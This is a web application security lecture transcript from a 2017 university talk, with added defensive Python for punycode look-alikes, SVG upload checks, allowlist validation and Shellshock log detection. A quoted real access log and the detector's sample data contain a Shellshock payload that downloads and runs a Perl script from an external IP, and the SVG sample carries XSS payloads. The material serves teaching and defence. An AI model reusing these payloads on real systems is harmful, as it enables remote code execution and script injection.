webapp security-tut-2017

HOW AND WHY WEB APP SECURITY FAILS?

16.2.2017, Tampere University of Technology

[email protected], Twitter: @Anakondantti

Upload: solita-oy

Post on 22-Jan-2018



FOREWORD, 1 MINUTE

› Solita?

› Me?

› Web application?
• Much more important than you may realize..

AGENDA

› How to make secure software?

› … But, everything is broken!

› … Because ...
• Same mistakes are repeated.
• Unthinkable, Unpossible, Impossiblator happens

› Practical web application security testing.

› Bonus: 10. fail 20. goto 10

SECURITY IS RISK MANAGEMENT

“If you know the enemy and know yourself, you need not fear the result of a hundred battles.”

Sun Tzu, Art of War

Source: Hackerman, Kung Fury movie

Source: NSA recruitment video.

Source: securityintelligence.com

Source: Lizard Squad hacking group logo

SOLITA #DEVSEC LANDSCAPE

GOOD NEWS:

SECURITY IS SIMPLE!

Bad news: Simple != easy

RECIPE FOR SECURE SOFTWARE

1. Design it properly. Do the right thing.

2. Do it right
   1. Mistake in implementation = bug = security issue

3. Prepare for the unthinkable

(Bug bounties etc. are useful too, but out of scope here.)

DO THE RIGHT THING

1. Don’t roll your own.
   1. Especially, don’t invent hash algorithms, RND or crypto!
   2. Seriously. Failure imminent and certain.

2. Follow best practices.

3. Understand what you are doing.
   1. Read the RFC. Understand your tools and libs.

SOMETHING UNTHINKABLE

It’s the same story every day..

UNTHINKABLE NAMES?

UNTHINKABLE DOMAINS AND DNS RECORDS (PUNYCODE ATTACK)
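The slide only names the punycode problem, so here is an added Python check (not from the talk and not Solita's code) for the defender's side of it: convert a domain between its `xn--` punycode form and its Unicode form, and flag any label that mixes scripts, which is how a look-alike such as a Latin name with one Cyrillic letter shows up. The script of a character is approximated by the first word of its Unicode name; the sample domains are constructed.

```python
import unicodedata


def to_unicode(domain: str) -> str:
    """Normalise a domain to its Unicode form (decodes xn-- punycode labels).

    encode() leaves already-ASCII labels untouched, decode() expands xn-- labels.
    """
    return domain.encode("idna").decode("idna")


def to_punycode(domain: str) -> str:
    """Encode a Unicode domain to the ASCII (xn--) form seen in DNS and logs."""
    return domain.encode("idna").decode("ascii")


def label_scripts(label: str) -> set:
    """Approximate the set of scripts used in one label.

    The first word of each letter's Unicode name (LATIN, CYRILLIC, GREEK, ...)
    stands in for its script; digits and hyphens are ignored.
    """
    scripts = set()
    for ch in label:
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts


def mixed_script_labels(domain: str) -> list:
    """Return the labels of `domain` that mix scripts; an empty list is clean."""
    return [label for label in to_unicode(domain).split(".")
            if len(label_scripts(label)) > 1]


# Constructed sample: Latin "paypal" with the second letter replaced by
# CYRILLIC SMALL LETTER A (U+0430), which renders identically in most fonts.
LOOKALIKE = "p\u0430ypal.com"

if __name__ == "__main__":
    puny = to_punycode(LOOKALIKE)
    print(puny, "->", to_unicode(puny))
    for d in ("example.com", LOOKALIKE, puny):
        print(d, "mixed-script labels:", mixed_script_labels(d))
```

The check catches labels that mix scripts; a label written entirely in one look-alike script is single-script and needs a confusables table (Unicode TR39) on top of this, which is the caveat to keep in mind before trusting a clean result.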

A PICTURE IS WORTH 1000 WORDS

› Demo-time: SVG is a picture file, right?

› Feeling lucky, punk?
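The demo's point is that an SVG is XML and may carry script, event handlers and references to external content. As an added example (not the talk's demo and not Solita's code), this Python check inspects an uploaded SVG with the standard library and reports why it should be rejected; the two sample files are constructed.

```python
import xml.etree.ElementTree as ET

# Elements that let an "image" execute code or embed foreign content.
ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object", "handler"}
# URL schemes that would run script or fetch something from outside the file.
BAD_SCHEMES = ("javascript:", "data:", "http:", "https:", "file:", "//")


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.split("}", 1)[1] if name.startswith("{") else name


def svg_findings(svg_bytes: bytes) -> list:
    """Return the reasons an uploaded SVG should be rejected (empty == clean)."""
    # Refuse DTDs outright: entity expansion and external entities (XXE) are a
    # separate class of trouble, so do not even hand them to the parser.
    if b"<!DOCTYPE" in svg_bytes or b"<!ENTITY" in svg_bytes:
        return ["DTD or entity declaration present"]
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.lower().startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href" and value.strip().lower().startswith(BAD_SCHEMES):
                findings.append(f"external or scripting href on <{tag}>: {value[:40]}")
    return findings


# Constructed samples: a harmless icon and an "image" that carries script.
CLEAN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
             b'<circle cx="5" cy="5" r="4"/></svg>')
EVIL_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <script>alert(1)</script>
  <a xlink:href="javascript:alert(1)"><text y="8">click</text></a>
</svg>'''

if __name__ == "__main__":
    print("clean:", svg_findings(CLEAN_SVG))
    print("evil: ", svg_findings(EVIL_SVG))
```

Rejecting every DOCTYPE is a deliberately strict choice: many editor-exported SVGs start with a harmless public DOCTYPE, so a real upload pipeline would either strip it before parsing or use a parser with entity expansion disabled. Serving user-supplied SVGs only as `<img>` sources (never inline) and with a restrictive Content-Security-Policy is the other half of the defence.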

WHAT THE ACTUAL **** ??

INPUT SANITATION = 80% WIN

THE SAME STORY ALL OVER!

› XSS, CSRF, SQL injection, XXE..
• Are all about input validation.

› Solution: white list allowed, deny everything else.

› There’s still 20% left
• You can fail session management certainly, but..
• Follow the advice: Don’t invent your own and you’ll be pretty safe.
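"White list allowed, deny everything else" in practice, as an added Python example (not from the talk): each accepted parameter gets an explicit pattern, unknown parameters are rejected, and a denylist is shown beside it to make the contrast visible. The field names and rules are assumptions for the illustration.

```python
import re

# Allowlist: every accepted field has an explicit shape. \A and \Z anchor the
# whole string; a trailing "$" would still accept "alice\n" because $ matches
# before a final newline, which is a common validation slip.
ALLOWED = {
    "username": re.compile(r"\A[a-z0-9_]{3,32}\Z"),
    "page":     re.compile(r"\A[1-9][0-9]{0,3}\Z"),
    "sort":     re.compile(r"\A(name|date|size)\Z"),
}


def validate(field: str, value: str) -> bool:
    """Accept a single value only if the field is known and matches its rule."""
    rule = ALLOWED.get(field)
    return rule is not None and rule.match(value) is not None


def validate_request(params: dict) -> list:
    """Return the names of parameters to reject; unknown fields are rejected too."""
    return sorted(name for name, value in params.items() if not validate(name, value))


# For contrast: a denylist tries to enumerate the bad things and misses variants.
DENYLIST = ("<script", "' or ", "--")


def denylist_accepts(value: str) -> bool:
    """Denylist decision: True means the value would have been let through."""
    return not any(bad in value for bad in DENYLIST)


if __name__ == "__main__":
    print(validate_request({"username": "alice_01", "page": "3", "sort": "date"}))
    print(validate_request({"username": "Alice", "debug": "1"}))
    # Case alone gets past the denylist; the allowlist never saw "<" as valid.
    print(denylist_accepts("<SCRIPT>"), validate("username", "<SCRIPT>"))
```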

JAVASCRIPT: NECESSARY (?) EVIL

JAVASCRIPT IS FULL OF EVIL (GREPPING “EVIL” FROM JS SOURCES)

The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute.

Arnold “Iceman” Schwarzenegger, movie Pwning iron.

DEMO/PRACTICE AGAINST GRUYERE

http://google-gruyere.appspot.com/

LET’S XSS !

› Reflected vs. Stored

› <script> doesn’t work?
• No problem, JS is everywhere..

› Can’t XMLHttpRequest?
• No prob, counter and fake

SQL INJECTION

› GRUYERE does not contain SQL injection..

› But .. It’s a good example of an injection

› SQL = Structured Query Language
• However, “query” is a bit of a misnomer..

What is this???

INPUT SANITATION,

STILL FAILING

LOGIC ATTACKS ARE DIFFICULT

› Real example..

REAL WORLD ATTACK

FROM A REAL ACCESS LOG (CUSTOMER IP REDACTED)

› 2015-02-09:

2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid:

Google tip: Shellshock
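A Shellshock probe is easy to spot in an access log once you know what to look for: a bash function definition, `() {`, sitting in a header that a CGI handler would export as an environment variable. As an added example (not from the talk and not Solita's tooling), this Python snippet parses lines in the format of the log above, flags the probe, and pulls the download URLs out of the payload for blocklisting. The first log line is constructed; the second is the request shown on the slide with the IPs redacted as there.

```python
import re

# Constructed log lines in the slide's print-wrapper format; the second one is
# the Shellshock request from the slide.
LOG_LINES = [
    "2015-02-09 09:10:33,001 INFO xxxx.infra.print-wrapper: Request 387201 start. "
    "host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /index.html "
    ",query-string: ,user-agent: Mozilla/5.0 (X11; Linux x86_64) ,referer: ,oid:",
    "2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. "
    "host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi "
    ",query-string: ,user-agent: () { :;}; /bin/bash -c \"cd /var/tmp;wget http://151.236.44.210/efixx;"
    "curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx\" ,referer: ,oid:",
]

# A bash function definition where a header value should be.
SHELLSHOCK = re.compile(r"\(\)\s*\{")
URL = re.compile(r"https?://[^\s\"';]+")
# Request fields that end up in the CGI environment and are worth inspecting.
CHECKED_FIELDS = ("user-agent", "referer", "query-string", "uri")


def parse_line(line: str) -> dict:
    """Split one 'Request N start.' line into its 'key: value' fields."""
    head, _, rest = line.partition(" start. ")
    fields = {"time": line[:23], "request": head.rsplit(" ", 1)[-1]}
    for part in rest.split(" ,"):
        key, _, value = part.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def find_shellshock(lines) -> list:
    """Return one alert per line whose inspected fields carry a Shellshock
    probe, with any download URLs pulled out of the payload."""
    alerts = []
    for line in lines:
        f = parse_line(line)
        for field in CHECKED_FIELDS:
            value = f.get(field, "")
            if SHELLSHOCK.search(value):
                alerts.append({
                    "time": f["time"], "request": f["request"],
                    "remote-addr": f.get("remote-addr"), "uri": f.get("uri"),
                    "field": field, "urls": sorted(set(URL.findall(value))),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in find_shellshock(LOG_LINES):
        print(alert)
```

Whether the probe succeeded is a separate question the access log cannot answer: that needs the bash version on the host, outbound connections from the web server to the listed URL, and files appearing under `/var/tmp`.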

WHAT THE ATTACKER WANTED?

efixx – first lines..

core – first lines..

DEV OR OPS? OR #DEVSEC ?

› Who is responsible for that server?

› Do you need to care as a developer?

› Ultimately: What is the developer’s responsibility?

SOME FAILS 2016-2017

Stories from the trenches

FAIL 1: THE BURDEN OF LEGACY

MD5 & C++ - “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE”

› Native code is dangerous..
• ASLR & DEP make buffer overflows more difficult to exploit, but it still happens.

› The lifespan of software can be surprisingly long..
• How to update and re-evaluate working software if nothing happens?
• Home-exercise: Sell this to team & customer. Involves risk and cost.

› New threats have emerged.
• What parts are affected?

Screenshot removed..

FAIL 2: SHORTCUTS AND ANARCHY

› Root cause: Heavy process, not understood / accepted by devs
• making developers miserable..

› The devs are innovative people..

http//unauthorized..V 1.3 coolserver

AwesomeSoftware_Upgrade.exe

FAIL 3: “I ACCIDENTALLY”

STORY 4: THE WEBHACK EVENT

› http://webhack.fi was a light-weight fun bug bounty hunt..
• The targets are not publicly accessible, but were production systems we created for our customers.

› Hackers hacked..

› .. SQL injection -> dumped the whole database

› .. But our code was fine! WAT?

ONE DOES NOT SIMPLY INJECT INTO..

› One issue turned out to be a 0-day in Spring libraries..

› Hnggh..

› The moral of the story is two-fold:
   1. even if you do everything right, you can still fail
   2. it’s not always so easy in real life..

› The gory details: https://github.com/solita/sqli-poc

FURTHER MATERIAL

• From the internet:

• OWASP Top 10
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

• OWASP ZAP proxy
https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

• Kali Linux
https://www.kali.org/